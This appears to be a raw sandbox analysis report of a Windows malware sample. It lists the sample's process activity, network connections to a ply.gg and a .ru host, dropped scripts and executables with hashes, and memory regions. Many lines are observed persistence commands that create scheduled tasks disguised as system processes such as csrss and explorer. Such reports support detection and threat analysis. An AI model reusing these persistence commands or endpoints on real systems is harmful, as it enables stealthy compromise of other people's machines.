schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\addins\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Windows\ImmersiveControlPanel\pris\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\SavesDllcommon\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\SavesDllcommon\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\SavesDllcommon\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "XClientX" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\XClient.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "XClient" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\XClient.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "XClientX" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\XClient.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Media Player\Visualizations\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Windows\SysWOW64\SMI\Manifests\unsecapp.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6py5WUoJqb.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\SavesDllcommon\System.exe

"C:\SavesDllcommon\System.exe"

C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe

"C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004BC

Network

Country Destination Domain Proto
US 8.8.8.8:53 loss-winners.gl.at.ply.gg udp
US 147.185.221.19:61007 loss-winners.gl.at.ply.gg tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 147.185.221.19:61007 loss-winners.gl.at.ply.gg tcp
RU 141.8.192.6:80 a0987391.xsph.ru tcp
RU 141.8.192.6:80 a0987391.xsph.ru tcp
RU 141.8.192.6:80 a0987391.xsph.ru tcp
US 147.185.221.19:61007 loss-winners.gl.at.ply.gg tcp
US 147.185.221.19:61007 loss-winners.gl.at.ply.gg tcp
RU 141.8.192.6:80 a0987391.xsph.ru tcp

Files

memory/568-0-0x00007FFFAE693000-0x00007FFFAE695000-memory.dmp

memory/568-1-0x0000000000C50000-0x0000000000C68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p4uidhoz.dzr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4392-10-0x000001191A880000-0x000001191A8A2000-memory.dmp

memory/4392-11-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/4392-13-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/4392-12-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/4392-14-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/4392-17-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/4392-18-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 21017c68eaf9461301de459f4f07e888
SHA1 41ff30fc8446508d4c3407c79e798cf6eaa5bb73
SHA256 03b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888
SHA512 956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e0391d00f5bfbc34be70790f14d5edf
SHA1 fcb04d8599c23967de4f154a101be480933ab0d0
SHA256 1c0c0c86d7c736fc9fb148ac7cd6e67565dc5b76fa116ae3b000a79e91855136
SHA512 231b9cc6efb928f0748cef04f287d9204c4f7d2eb4bc27f345e9a1afc6d0675057978ca44d1a95334ee2380709aa6dbe74015fedff8f17611a64efcfb9f64d2a

memory/568-51-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uliqxd.exe

MD5 5841e08c36ee75ba2d4002507ceb9be8
SHA1 c679478e7041b2c3f0659403e87dc1bf011e7f2c
SHA256 85905bb938abe1ea461869f73103f364f2dddaae579f35d460338a21db8b8056
SHA512 2fdd014e5c128e7bb6112cc3facf50dd413dbb7d9e705d7c3b21dd0a9d4717281d1bdb62bf416ed1e651bea8177db3d3ae0b3ac6ba729e0eb9010e694d8d7744

C:\SavesDllcommon\gdNhr8l.vbe

MD5 67750c3e2cc7970484d8e1f3e95c4454
SHA1 b4a6e933dfda3db9a2663798f421a2b06a0c5b35
SHA256 a5c935975dff3bdbd1fd9c63abc8c47d2e24dd408dd5d0760b8af2db291c9655
SHA512 d794c9fdc99334fe3627d03e63e41d67a6f47e5b1601eb3c4c9cd037dd6b74c238e3bd8510c7755fd4e6f366b140bf9b82d6fbe734237ee8d44de51a193c1fa9

C:\SavesDllcommon\BRvogp3keJwY6M0FyR4uWbtTK.bat

MD5 0a9ef172b5e9daeb9c3366842676eac9
SHA1 18ce47e6f7a7dc2a4c0882a7fa1e69bc91f22cd2
SHA256 4193c6cb4fcc0e633a062825fc4b510d826d68063be74cf7f37d5db3a75ea2b6
SHA512 dc1985d420f4d7058529acd1afce2bd9e047f95074a3f12ca0923903bb3dab615fb938464d6a75adfd4a890aa3eeda9797c13bfb867bb02e02945af3c108d563

C:\SavesDllcommon\fontsaves.exe

MD5 73ace1b8b0f1b1c088f11ee29b13ae6b
SHA1 4b7fa04aacb5a23ab37b9caaee8f852a1bd33bbc
SHA256 8be76a2960a823f9284836868172eff28b64de44daba8b09f91ff678bb22d614
SHA512 1e13cc8ac20c9e10cd13f78cb54e75b23ad255d1601d45ee78770f3cb74fe5e9bb3e84d8ca8f7c44659365da45a79b72be85d6433a8bbbac79b925839cc7e4d1

memory/4000-72-0x00000000007D0000-0x0000000000902000-memory.dmp

memory/4000-73-0x000000001B5A0000-0x000000001B5BC000-memory.dmp

memory/4000-75-0x000000001B5C0000-0x000000001B5D6000-memory.dmp

memory/4000-74-0x000000001B610000-0x000000001B660000-memory.dmp

memory/4000-76-0x0000000002A50000-0x0000000002A5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6py5WUoJqb.bat

MD5 6427be0302c789764be5d54f7e002a0a
SHA1 ac7f0dc923bea68b72d321b4770e5d70eaa8c9e2
SHA256 ec42526166d1e5aa74bd6015cb52224f553a437f39c36516a1f1d79340d02b19
SHA512 5eefe384774b8b754e9428aed6fdfcf8649c0b5204d67798fa3f0cebd09a143eae2e5e4accdb168db53c370042faeb488b191b2b3a68b52a25e1b8f155fdb620

memory/568-115-0x00007FFFAE690000-0x00007FFFAF152000-memory.dmp

memory/568-119-0x0000000002DA0000-0x0000000002DAC000-memory.dmp

memory/3428-120-0x000000001BE90000-0x000000001BED6000-memory.dmp

memory/3428-122-0x000000001BF10000-0x000000001BF1D000-memory.dmp

memory/3428-121-0x000000001BEE0000-0x000000001BEE9000-memory.dmp

memory/3428-123-0x000000001C440000-0x000000001C45E000-memory.dmp

memory/3428-124-0x000000001BF20000-0x000000001BF2B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Meatspin_FULL.exe

MD5 137c1b0243beb35b6a0b6dbe632dc341
SHA1 b710da533d9a33f4d7fc78d317bbcee8dc95826d
SHA256 86cd8a8dc5228014e559788e7a0f5ed6fef637691bf53111e9eab4187a0652ab
SHA512 49ee75b71223ed47ae81a089247ff3002d50f70ede8e57af42f73745bbf7cb8ee7c71c1ab5da9d967fbe0b2f9de5dad70f4a7f4cfe44ba104d5a60be53eccabf

memory/1284-171-0x000001586BCF0000-0x000001586C0B4000-memory.dmp

memory/568-177-0x0000000001540000-0x000000000154C000-memory.dmp

memory/1284-181-0x000001586E880000-0x000001586E89E000-memory.dmp

memory/1284-182-0x000001586E8A0000-0x000001586E8AB000-memory.dmp

memory/1284-180-0x000001586E870000-0x000001586E87D000-memory.dmp

memory/1284-179-0x000001586DD50000-0x000001586DD59000-memory.dmp

memory/1284-178-0x000001586E690000-0x000001586E6D6000-memory.dmp